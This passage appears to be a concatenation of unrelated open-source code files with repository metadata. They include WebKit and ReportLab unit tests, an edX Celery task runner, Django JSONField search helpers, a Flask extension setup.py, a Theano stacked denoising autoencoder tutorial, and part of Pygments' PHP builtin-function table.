https://bugs.webkit.org/show_bug.cgi?id=68143
Reviewed by Geoffrey Garen.
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
mock_same_author_commit_message = """Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2011-09-15 19:56:21 +0000
Value profiles collect no information for global variables
https://bugs.webkit.org/show_bug.cgi?id=68143
Reviewed by Geoffrey Garen.
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
def _make_options(self, **kwargs):
defaults = {
'committer_minimum': 10,
'max_commit_age': 9,
'reviewer_minimum': 80,
'show_commits': False,
'verbose': False,
}
options = MockOptions(**defaults)
options.update(**kwargs)
return options
def test_recent_commit_messages(self):
tool = MockTool()
suggest_nominations = SuggestNominations()
suggest_nominations._init_options(options=self._make_options())
suggest_nominations.bind_to_tool(tool)
tool.executive.run_command = lambda command: self.mock_git_output
self.assertEqual(list(suggest_nominations._recent_commit_messages()), [self.mock_same_author_commit_message])
mock_non_committer_commit_message = """
Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2009-09-15 14:08:42 +0000
Let TestWebKitAPI work for chromium
https://bugs.webkit.org/show_bug.cgi?id=67756
Patch by Xianzhu Wang <[email protected]> on 2011-09-15
Reviewed by Sam Weinig.
Source/WebKit/chromium:
* WebKit.gyp:
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95188 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
def test_basic(self):
expected_stdout = "REVIEWER: Xianzhu Wang ([email protected]) has 88 reviewed patches\n"
options = self._make_options()
suggest_nominations = SuggestNominations()
suggest_nominations._init_options(options=options)
suggest_nominations._recent_commit_messages = lambda: [self.mock_non_committer_commit_message for _ in range(88)]
self.assert_execute_outputs(suggest_nominations, [], expected_stdout=expected_stdout, options=options)
| bsd-3-clause | -3,160,849,053,707,772,000 | 42.145631 | 121 | 0.743474 | false |
paran0ids0ul/infernal-twin | build/reportlab/tests/test_widgetbase_tpc.py | 15 | 2997 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
"""
Tests for TypedPropertyCollection class.
"""
__version__='''$Id$'''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation
setOutDir(__name__)
import os, sys, copy
from os.path import join, basename, splitext
import unittest
from reportlab.graphics.widgetbase import PropHolder, TypedPropertyCollection
from reportlab.lib.attrmap import AttrMap, AttrMapValue
from reportlab.lib.validators import isNumber
TPC = TypedPropertyCollection
class PH(PropHolder):
_attrMap = AttrMap(
a = AttrMapValue(isNumber),
b = AttrMapValue(isNumber)
)
class APH(PH):
def __init__(self):
self.a = 1
class BPH(APH):
def __init__(self):
APH.__init__(self)
def __getattr__(self,name):
if name=='b': return -1
raise AttributeError
class TPCTestCase(unittest.TestCase):
"Test TypedPropertyCollection class."
def test0(self):
"Test setting an invalid collective attribute."
t = TPC(PH)
try:
t.c = 42
except AttributeError:
pass
def test1(self):
"Test setting a valid collective attribute."
t = TPC(PH)
t.a = 42
assert t.a == 42
def test2(self):
"Test setting a valid collective attribute with an invalid value."
t = TPC(PH)
try:
t.a = 'fourty-two'
except AttributeError:
pass
def test3(self):
"Test setting a valid collective attribute with a convertible invalid value."
t = TPC(PH)
t.a = '42'
assert t.a == '42' # Or should it rather be an integer?
def test4(self):
"Test accessing an unset collective attribute."
t = TPC(PH)
try:
t.a
except AttributeError:
pass
def test5(self):
"Test overwriting a collective attribute in one slot."
t = TPC(PH)
t.a = 42
t[0].a = 4242
assert t[0].a == 4242
def test6(self):
"Test overwriting a one slot attribute with a collective one."
t = TPC(PH)
t[0].a = 4242
t.a = 42
assert t[0].a == 4242
def test7(self):
"Test to ensure we can handle classes with __getattr__ methods"
a=TypedPropertyCollection(APH)
b=TypedPropertyCollection(BPH)
a.a=3
b.a=4
try:
a.b
assert 1, "Shouldn't be able to see a.b"
except AttributeError:
pass
a.b=0
assert a.b==0, "Wrong value for "+str(a.b)
assert b.b==-1, "This should call __getattr__ special"
b.b=0
assert a[0].b==0
assert b[0].b==-1, "Class __getattr__ should return -1"
def makeSuite():
return makeSuiteForClasses(TPCTestCase)
#noruntests
if __name__ == "__main__":
unittest.TextTestRunner().run(makeSuite())
printLocation()
| gpl-3.0 | 5,591,823,480,198,696,000 | 21.036765 | 85 | 0.584585 | false |
ahmedaljazzar/edx-platform | lms/djangoapps/instructor_task/tasks_helper/runner.py | 16 | 5153 | import json
import logging
from time import time
from celery import current_task
from django.db import reset_queries
import dogstats_wrapper as dog_stats_api
from lms.djangoapps.instructor_task.models import PROGRESS, InstructorTask
from util.db import outer_atomic
TASK_LOG = logging.getLogger('edx.celery.task')
class TaskProgress(object):
"""
Encapsulates the current task's progress by keeping track of
'attempted', 'succeeded', 'skipped', 'failed', 'total',
'action_name', and 'duration_ms' values.
"""
def __init__(self, action_name, total, start_time):
self.action_name = action_name
self.total = total
self.start_time = start_time
self.attempted = 0
self.succeeded = 0
self.skipped = 0
self.failed = 0
self.preassigned = 0
def update_task_state(self, extra_meta=None):
"""
Update the current celery task's state to the progress state
specified by the current object. Returns the progress
dictionary for use by `run_main_task` and
`BaseInstructorTask.on_success`.
Arguments:
extra_meta (dict): Extra metadata to pass to `update_state`
Returns:
dict: The current task's progress dict
"""
progress_dict = {
'action_name': self.action_name,
'attempted': self.attempted,
'succeeded': self.succeeded,
'skipped': self.skipped,
'failed': self.failed,
'total': self.total,
'preassigned': self.preassigned,
'duration_ms': int((time() - self.start_time) * 1000),
}
if extra_meta is not None:
progress_dict.update(extra_meta)
_get_current_task().update_state(state=PROGRESS, meta=progress_dict)
return progress_dict
def run_main_task(entry_id, task_fcn, action_name):
"""
Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.
Arguments passed to `task_fcn` are:
`entry_id` : the primary key for the InstructorTask entry representing the task.
`course_id` : the id for the course.
`task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
`action_name` : past-tense verb to use for constructing status messages.
If no exceptions are raised, the `task_fcn` should return a dict containing
the task's result with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages.
Should be past-tense. Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
"""
# Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
# There's no point in catching it here.
with outer_atomic():
entry = InstructorTask.objects.get(pk=entry_id)
entry.task_state = PROGRESS
entry.save_now()
# Get inputs to use in this task from the entry
task_id = entry.task_id
course_id = entry.course_id
task_input = json.loads(entry.task_input)
# Construct log message
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)
# Check that the task_id submitted in the InstructorTask matches the current task
# that is running.
request_task_id = _get_current_task().request.id
if task_id != request_task_id:
fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
TASK_LOG.error(message)
raise ValueError(message)
# Now do the work
with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
task_progress = task_fcn(entry_id, course_id, task_input, action_name)
# Release any queries that the connection has been hanging onto
reset_queries()
# Log and exit, returning task_progress info as task result
TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
return task_progress
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
| agpl-3.0 | 2,378,203,933,158,948,400 | 37.744361 | 113 | 0.659228 | false |
parksandwildlife/biosys | biosys/apps/main/utils_misc.py | 4 | 2739 | from django.db.models.expressions import RawSQL
def get_value(keys, dict_, default=None):
"""
    Given a list of keys, search a dict for the first matching key and return its value.
    Note: the search is case insensitive.
:param keys: list of possible keys
:param dict_:
:param default:
:return:
"""
keys = [k.lower() for k in keys]
# lower the dict keys
d_low = dict((k.lower(), v) for k, v in dict_.items())
for key in keys:
if key in d_low:
return d_low.get(key)
return default
def search_json_field(qs, json_field_name, keys, search_param):
"""
    The standard search filter does not support searching within a JSONField,
    so this helper applies a raw SQL ILIKE filter over the given keys.
:param qs: queryset
:param json_field_name: json field with values within to search
:param keys: list of keys in json field to search
:param search_param: value to search
:return: the queryset after search filters applied
"""
where_clauses = []
params = []
for key in keys:
where_clauses.append(json_field_name + '->>%s ILIKE %s')
params += [key, '%' + search_param + '%']
return qs.extra(where=['OR '.join(where_clauses)], params=params)
def search_json_fields(qs, field_info, search_param):
"""
    The standard search filter does not support searching within JSONFields,
    so this helper applies raw SQL ILIKE filters across several JSON fields.
:param qs: queryset
:param field_info: dictionary with json_field_name as the key and each json_field's respective keys as the value
:param search_param: value to search
:return: the queryset after search filters applied
"""
where_clauses = []
params = []
for json_field_name in field_info.keys():
for key in field_info[json_field_name]:
where_clauses.append(json_field_name + '->>%s ILIKE %s')
params += [key, '%' + search_param + '%']
return qs.extra(where=['OR '.join(where_clauses)], params=params)
def order_by_json_field(qs, json_field_name, keys, ordering_param):
"""
    Standard ordering does not support ordering by values within a JSONField,
    so this helper orders by a raw SQL expression when applicable.
:param qs: queryset
:param json_field_name: json field with values within to potentially order by
:param keys: list of keys in json field to potentially order by
:param ordering_param: field to order by, prefixed with '-' for descending order
:return: the queryset after ordering is applied if order_by param is within the json field
"""
for key in keys:
if ordering_param == key or ordering_param == '-' + key:
if ordering_param.startswith('-'):
qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param[1:],)).desc())
else:
qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param,)))
return qs
| apache-2.0 | -3,675,758,877,846,044,000 | 34.571429 | 116 | 0.636364 | false |
lovette/flask_signedcookies | setup.py | 1 | 1129 | from setuptools import setup
setup(
name='flask_signedcookies',
version='1.0.0',
url='https://github.com/lovette/flask_signedcookies',
download_url = 'https://github.com/lovette/flask_signedcookies/archive/master.tar.gz',
license='BSD',
author='Lance Lovette',
author_email='[email protected]',
description='Flask extension that provides easy access to signed cookies.',
long_description=open('README.md').read(),
py_modules=['flask_signedcookies',],
install_requires=['Flask',],
tests_require=['nose',],
zip_safe=False,
platforms='any',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| bsd-3-clause | -7,898,864,492,778,144,000 | 36.633333 | 87 | 0.638618 | false |
fegonda/icon_demo | code/external/SdA.py | 4 | 18933 | """
This tutorial introduces stacked denoising auto-encoders (SdA) using Theano.
Denoising autoencoders are the building blocks for SdA.
They are based on auto-encoders as the ones used in Bengio et al. 2007.
An autoencoder takes an input x and first maps it to a hidden representation
y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting
latent representation y is then mapped back to a "reconstructed" vector
z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight
matrix W' can optionally be constrained such that W' = W^T, in which case
the autoencoder is said to have tied weights. The network is trained such
that to minimize the reconstruction error (the error between x and z).
For the denosing autoencoder, during training, first x is corrupted into
\tilde{x}, where \tilde{x} is a partially destroyed version of x by means
of a stochastic mapping. Afterwards y is computed as before (using
\tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction
error is now measured between z and the uncorrupted input x, which is
computed as the cross-entropy :
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,
2008
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from logistic_sgd import LogisticRegression, load_data
from mlp import HiddenLayer
from dA import dA
# start-snippet-1
class SdA(object):
"""Stacked denoising auto-encoder class (SdA)
A stacked denoising autoencoder model is obtained by stacking several
dAs. The hidden layer of the dA at layer `i` becomes the input of
the dA at layer `i+1`. The first layer dA gets as input the input of
the SdA, and the hidden layer of the last dA represents the output.
    Note that after pretraining, the SdA is dealt with as a normal MLP;
    the dAs are only used to initialize the weights.
"""
def __init__(
self,
numpy_rng,
theano_rng=None,
n_ins=784,
hidden_layers_sizes=[500, 500],
n_outs=10,
corruption_levels=[0.1, 0.1]
):
""" This class is made to support a variable number of layers.
:type numpy_rng: numpy.random.RandomState
:param numpy_rng: numpy random number generator used to draw initial
weights
:type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
:param theano_rng: Theano random generator; if None is given one is
generated based on a seed drawn from `rng`
:type n_ins: int
:param n_ins: dimension of the input to the sdA
        :type hidden_layers_sizes: list of ints
        :param hidden_layers_sizes: intermediate layers sizes, must contain
at least one value
:type n_outs: int
:param n_outs: dimension of the output of the network
:type corruption_levels: list of float
:param corruption_levels: amount of corruption to use for each
layer
"""
self.sigmoid_layers = []
self.dA_layers = []
self.params = []
self.n_layers = len(hidden_layers_sizes)
assert self.n_layers > 0
if not theano_rng:
theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
# allocate symbolic variables for the data
self.x = T.matrix('x') # the data is presented as rasterized images
self.y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
# end-snippet-1
# The SdA is an MLP, for which all weights of intermediate layers
# are shared with a different denoising autoencoders
# We will first construct the SdA as a deep multilayer perceptron,
# and when constructing each sigmoidal layer we also construct a
# denoising autoencoder that shares weights with that layer
# During pretraining we will train these autoencoders (which will
        # lead to changing the weights of the MLP as well)
# During finetunining we will finish training the SdA by doing
        # stochastic gradient descent on the MLP
# start-snippet-2
for i in xrange(self.n_layers):
# construct the sigmoidal layer
# the size of the input is either the number of hidden units of
# the layer below or the input size if we are on the first layer
if i == 0:
input_size = n_ins
else:
input_size = hidden_layers_sizes[i - 1]
# the input to this layer is either the activation of the hidden
# layer below or the input of the SdA if you are on the first
# layer
if i == 0:
layer_input = self.x
else:
layer_input = self.sigmoid_layers[-1].output
sigmoid_layer = HiddenLayer(rng=numpy_rng,
input=layer_input,
n_in=input_size,
n_out=hidden_layers_sizes[i],
activation=T.nnet.sigmoid)
# add the layer to our list of layers
self.sigmoid_layers.append(sigmoid_layer)
            # it's arguably a philosophical question...
# but we are going to only declare that the parameters of the
# sigmoid_layers are parameters of the StackedDAA
# the visible biases in the dA are parameters of those
# dA, but not the SdA
self.params.extend(sigmoid_layer.params)
# Construct a denoising autoencoder that shared weights with this
# layer
dA_layer = dA(numpy_rng=numpy_rng,
theano_rng=theano_rng,
input=layer_input,
n_visible=input_size,
n_hidden=hidden_layers_sizes[i],
W=sigmoid_layer.W,
bhid=sigmoid_layer.b)
self.dA_layers.append(dA_layer)
# end-snippet-2
# We now need to add a logistic layer on top of the MLP
self.logLayer = LogisticRegression(
input=self.sigmoid_layers[-1].output,
n_in=hidden_layers_sizes[-1],
n_out=n_outs
)
self.params.extend(self.logLayer.params)
# construct a function that implements one step of finetunining
# compute the cost for second phase of training,
# defined as the negative log likelihood
self.finetune_cost = self.logLayer.negative_log_likelihood(self.y)
# compute the gradients with respect to the model parameters
# symbolic variable that points to the number of errors made on the
# minibatch given by self.x and self.y
self.errors = self.logLayer.errors(self.y)
def pretraining_functions(self, train_set_x, batch_size):
''' Generates a list of functions, each of them implementing one
        step in training the dA corresponding to the layer with the same index.
The function will require as input the minibatch index, and to train
a dA you just need to iterate, calling the corresponding function on
all minibatch indexes.
:type train_set_x: theano.tensor.TensorType
:param train_set_x: Shared variable that contains all datapoints used
for training the dA
:type batch_size: int
:param batch_size: size of a [mini]batch
:type learning_rate: float
:param learning_rate: learning rate used during training for any of
the dA layers
'''
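        # Typical pretraining loop over the returned functions (sketch; the
        # surrounding variable names are illustrative):
        #     for i in xrange(sda.n_layers):
        #         for epoch in xrange(pretraining_epochs):
        #             c = [pretraining_fns[i](index=batch, corruption=0.2, lr=0.001)
        #                  for batch in xrange(n_train_batches)]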
# index to a [mini]batch
index = T.lscalar('index') # index to a minibatch
corruption_level = T.scalar('corruption') # % of corruption to use
learning_rate = T.scalar('lr') # learning rate to use
# begining of a batch, given `index`
batch_begin = index * batch_size
# ending of a batch given `index`
batch_end = batch_begin + batch_size
pretrain_fns = []
for dA in self.dA_layers:
# get the cost and the updates list
cost, updates = dA.get_cost_updates(corruption_level,
learning_rate)
# compile the theano function
fn = theano.function(
inputs=[
index,
theano.Param(corruption_level, default=0.2),
theano.Param(learning_rate, default=0.1)
],
outputs=cost,
updates=updates,
givens={
self.x: train_set_x[batch_begin: batch_end]
}
)
# append `fn` to the list of functions
pretrain_fns.append(fn)
return pretrain_fns
def build_finetune_functions(self, datasets, batch_size, learning_rate):
'''Generates a function `train` that implements one step of
finetuning, a function `validate` that computes the error on
        the whole validation set, and a function `test` that
        computes the error on the whole testing set
:type datasets: list of pairs of theano.tensor.TensorType
        :param datasets: It is a list that contains all the datasets;
                         it has to contain three pairs, `train`,
`valid`, `test` in this order, where each pair
is formed of two Theano variables, one for the
datapoints, the other for the labels
:type batch_size: int
:param batch_size: size of a minibatch
:type learning_rate: float
:param learning_rate: learning rate used during finetune stage
'''
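        # Minimal usage sketch (names are illustrative):
        #     train_fn, valid_score, test_score = sda.build_finetune_functions(
        #         datasets=datasets, batch_size=1, learning_rate=0.1)
        #     avg_cost = train_fn(0)          # one SGD step on minibatch 0
        #     mean_error = numpy.mean(valid_score())  # error over the whole set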
(train_set_x, train_set_y) = datasets[0]
(valid_set_x, valid_set_y) = datasets[1]
(test_set_x, test_set_y) = datasets[2]
# compute number of minibatches for training, validation and testing
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]
n_valid_batches /= batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0]
n_test_batches /= batch_size
index = T.lscalar('index') # index to a [mini]batch
# compute the gradients with respect to the model parameters
gparams = T.grad(self.finetune_cost, self.params)
# compute list of fine-tuning updates
updates = [
(param, param - gparam * learning_rate)
for param, gparam in zip(self.params, gparams)
]
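        # i.e. plain stochastic gradient descent:
        #     param_new = param_old - learning_rate * d(finetune_cost)/d(param)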
train_fn = theano.function(
inputs=[index],
outputs=self.finetune_cost,
updates=updates,
givens={
self.x: train_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: train_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='train'
)
test_score_i = theano.function(
[index],
self.errors,
givens={
self.x: test_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: test_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='test'
)
valid_score_i = theano.function(
[index],
self.errors,
givens={
self.x: valid_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: valid_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='valid'
)
# Create a function that scans the entire validation set
def valid_score():
return [valid_score_i(i) for i in xrange(n_valid_batches)]
# Create a function that scans the entire test set
def test_score():
return [test_score_i(i) for i in xrange(n_test_batches)]
return train_fn, valid_score, test_score
def test_SdA(finetune_lr=0.1, pretraining_epochs=15,
pretrain_lr=0.001, training_epochs=1000,
dataset='mnist.pkl.gz', batch_size=1):
"""
    Demonstrates how to train and test a stacked denoising autoencoder.
This is demonstrated on MNIST.
    :type finetune_lr: float
    :param finetune_lr: learning rate used in the finetune stage
(factor for the stochastic gradient)
:type pretraining_epochs: int
    :param pretraining_epochs: number of epochs to do pretraining
:type pretrain_lr: float
:param pretrain_lr: learning rate to be used during pre-training
    :type training_epochs: int
    :param training_epochs: maximal number of iterations to run the optimizer
:type dataset: string
    :param dataset: path to the pickled dataset
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
# numpy random generator
# start-snippet-3
numpy_rng = numpy.random.RandomState(89677)
print '... building the model'
# construct the stacked denoising autoencoder class
sda = SdA(
numpy_rng=numpy_rng,
n_ins=28 * 28,
hidden_layers_sizes=[1000, 1000, 1000],
n_outs=10
)
# end-snippet-3 start-snippet-4
#########################
# PRETRAINING THE MODEL #
#########################
print '... getting the pretraining functions'
pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x,
batch_size=batch_size)
print '... pre-training the model'
start_time = time.clock()
## Pre-train layer-wise
corruption_levels = [.1, .2, .3]
for i in xrange(sda.n_layers):
# go through pretraining epochs
for epoch in xrange(pretraining_epochs):
# go through the training set
c = []
for batch_index in xrange(n_train_batches):
c.append(pretraining_fns[i](index=batch_index,
corruption=corruption_levels[i],
lr=pretrain_lr))
print 'Pre-training layer %i, epoch %d, cost ' % (i, epoch),
print numpy.mean(c)
end_time = time.clock()
print >> sys.stderr, ('The pretraining code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
# end-snippet-4
########################
# FINETUNING THE MODEL #
########################
# get the training, validation and testing function for the model
print '... getting the finetuning functions'
train_fn, validate_model, test_model = sda.build_finetune_functions(
datasets=datasets,
batch_size=batch_size,
learning_rate=finetune_lr
)
    print '... finetuning the model'
# early-stopping parameters
    patience = 10 * n_train_batches  # look at this many examples regardless
patience_increase = 2. # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatches before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch
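    # illustrative numbers (assuming the standard MNIST split of 50,000
    # training examples and batch_size=1): n_train_batches = 50000, so
    # patience starts at 500,000 iterations and validation_frequency = 50000,
    # i.e. the validation set is evaluated once per epoch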
best_validation_loss = numpy.inf
test_score = 0.
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < training_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_fn(minibatch_index)
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
validation_losses = validate_model()
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if (
this_validation_loss < best_validation_loss *
improvement_threshold
):
patience = max(patience, iter * patience_increase)
# save best validation score and iteration number
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = test_model()
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f %%') %
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
if patience <= iter:
done_looping = True
break
end_time = time.clock()
print(
(
'Optimization complete with best validation score of %f %%, '
'on iteration %i, '
'with test performance %f %%'
)
% (best_validation_loss * 100., best_iter + 1, test_score * 100.)
)
print >> sys.stderr, ('The training code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
if __name__ == '__main__':
test_SdA()
| mit | -3,914,538,588,230,447,000 | 37.717791 | 77 | 0.567316 | false |
sebfung/yellowpillowcase | vendor/cache/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/lexers/_phpbuiltins.py | 47 | 154371 | # -*- coding: utf-8 -*-
"""
pygments.lexers._phpbuiltins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This file loads the function names and their modules from the
php webpage and generates itself.
Do not alter the MODULES dict by hand!
    WARNING: the generation transfers quite a lot of data over your
             internet connection. Don't run that at home, use
             a server ;-)
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
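# MODULES maps a PHP extension/module name to the list of function names it
# provides, e.g. MODULES['Math'] contains 'abs', 'sin', 'sqrt', ...; the PHP
# lexer can use this mapping to recognise and highlight built-in functions.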
MODULES = {'.NET': ['dotnet_load'],
'APC': ['apc_add',
'apc_bin_dump',
'apc_bin_dumpfile',
'apc_bin_load',
'apc_bin_loadfile',
'apc_cache_info',
'apc_cas',
'apc_clear_cache',
'apc_compile_file',
'apc_dec',
'apc_define_constants',
'apc_delete_file',
'apc_delete',
'apc_exists',
'apc_fetch',
'apc_inc',
'apc_load_constants',
'apc_sma_info',
'apc_store'],
'APD': ['apd_breakpoint',
'apd_callstack',
'apd_clunk',
'apd_continue',
'apd_croak',
'apd_dump_function_table',
'apd_dump_persistent_resources',
'apd_dump_regular_resources',
'apd_echo',
'apd_get_active_symbols',
'apd_set_pprof_trace',
'apd_set_session_trace_socket',
'apd_set_session_trace',
'apd_set_session',
'override_function',
'rename_function'],
'Aliases and deprecated Mysqli': ['mysqli_bind_param',
'mysqli_bind_result',
'mysqli_client_encoding',
'mysqli_connect',
'mysqli_disable_rpl_parse',
'mysqli_enable_reads_from_master',
'mysqli_enable_rpl_parse',
'mysqli_escape_string',
'mysqli_execute',
'mysqli_fetch',
'mysqli_get_cache_stats',
'mysqli_get_metadata',
'mysqli_master_query',
'mysqli_param_count',
'mysqli_report',
'mysqli_rpl_parse_enabled',
'mysqli_rpl_probe',
'mysqli_send_long_data',
'mysqli_slave_query'],
'Apache': ['apache_child_terminate',
'apache_get_modules',
'apache_get_version',
'apache_getenv',
'apache_lookup_uri',
'apache_note',
'apache_request_headers',
'apache_reset_timeout',
'apache_response_headers',
'apache_setenv',
'getallheaders',
'virtual'],
'Array': ['array_change_key_case',
'array_chunk',
'array_column',
'array_combine',
'array_count_values',
'array_diff_assoc',
'array_diff_key',
'array_diff_uassoc',
'array_diff_ukey',
'array_diff',
'array_fill_keys',
'array_fill',
'array_filter',
'array_flip',
'array_intersect_assoc',
'array_intersect_key',
'array_intersect_uassoc',
'array_intersect_ukey',
'array_intersect',
'array_key_exists',
'array_keys',
'array_map',
'array_merge_recursive',
'array_merge',
'array_multisort',
'array_pad',
'array_pop',
'array_product',
'array_push',
'array_rand',
'array_reduce',
'array_replace_recursive',
'array_replace',
'array_reverse',
'array_search',
'array_shift',
'array_slice',
'array_splice',
'array_sum',
'array_udiff_assoc',
'array_udiff_uassoc',
'array_udiff',
'array_uintersect_assoc',
'array_uintersect_uassoc',
'array_uintersect',
'array_unique',
'array_unshift',
'array_values',
'array_walk_recursive',
'array_walk',
'array',
'arsort',
'asort',
'compact',
'count',
'current',
'each',
'end',
'extract',
'in_array',
'key_exists',
'key',
'krsort',
'ksort',
'list',
'natcasesort',
'natsort',
'next',
'pos',
'prev',
'range',
'reset',
'rsort',
'shuffle',
'sizeof',
'sort',
'uasort',
'uksort',
'usort'],
'BBCode': ['bbcode_add_element',
'bbcode_add_smiley',
'bbcode_create',
'bbcode_destroy',
'bbcode_parse',
'bbcode_set_arg_parser',
'bbcode_set_flags'],
'BC Math': ['bcadd',
'bccomp',
'bcdiv',
'bcmod',
'bcmul',
'bcpow',
'bcpowmod',
'bcscale',
'bcsqrt',
'bcsub'],
'Blenc': ['blenc_encrypt'],
'Bzip2': ['bzclose',
'bzcompress',
'bzdecompress',
'bzerrno',
'bzerror',
'bzerrstr',
'bzflush',
'bzopen',
'bzread',
'bzwrite'],
'COM': ['com_addref',
'com_create_guid',
'com_event_sink',
'com_get_active_object',
'com_get',
'com_invoke',
'com_isenum',
'com_load_typelib',
'com_load',
'com_message_pump',
'com_print_typeinfo',
'com_propget',
'com_propput',
'com_propset',
'com_release',
'com_set',
'variant_abs',
'variant_add',
'variant_and',
'variant_cast',
'variant_cat',
'variant_cmp',
'variant_date_from_timestamp',
'variant_date_to_timestamp',
'variant_div',
'variant_eqv',
'variant_fix',
'variant_get_type',
'variant_idiv',
'variant_imp',
'variant_int',
'variant_mod',
'variant_mul',
'variant_neg',
'variant_not',
'variant_or',
'variant_pow',
'variant_round',
'variant_set_type',
'variant_set',
'variant_sub',
'variant_xor'],
'CUBRID': ['cubrid_bind',
'cubrid_close_prepare',
'cubrid_close_request',
'cubrid_col_get',
'cubrid_col_size',
'cubrid_column_names',
'cubrid_column_types',
'cubrid_commit',
'cubrid_connect_with_url',
'cubrid_connect',
'cubrid_current_oid',
'cubrid_disconnect',
'cubrid_drop',
'cubrid_error_code_facility',
'cubrid_error_code',
'cubrid_error_msg',
'cubrid_execute',
'cubrid_fetch',
'cubrid_free_result',
'cubrid_get_autocommit',
'cubrid_get_charset',
'cubrid_get_class_name',
'cubrid_get_client_info',
'cubrid_get_db_parameter',
'cubrid_get_query_timeout',
'cubrid_get_server_info',
'cubrid_get',
'cubrid_insert_id',
'cubrid_is_instance',
'cubrid_lob_close',
'cubrid_lob_export',
'cubrid_lob_get',
'cubrid_lob_send',
'cubrid_lob_size',
'cubrid_lob2_bind',
'cubrid_lob2_close',
'cubrid_lob2_export',
'cubrid_lob2_import',
'cubrid_lob2_new',
'cubrid_lob2_read',
'cubrid_lob2_seek64',
'cubrid_lob2_seek',
'cubrid_lob2_size64',
'cubrid_lob2_size',
'cubrid_lob2_tell64',
'cubrid_lob2_tell',
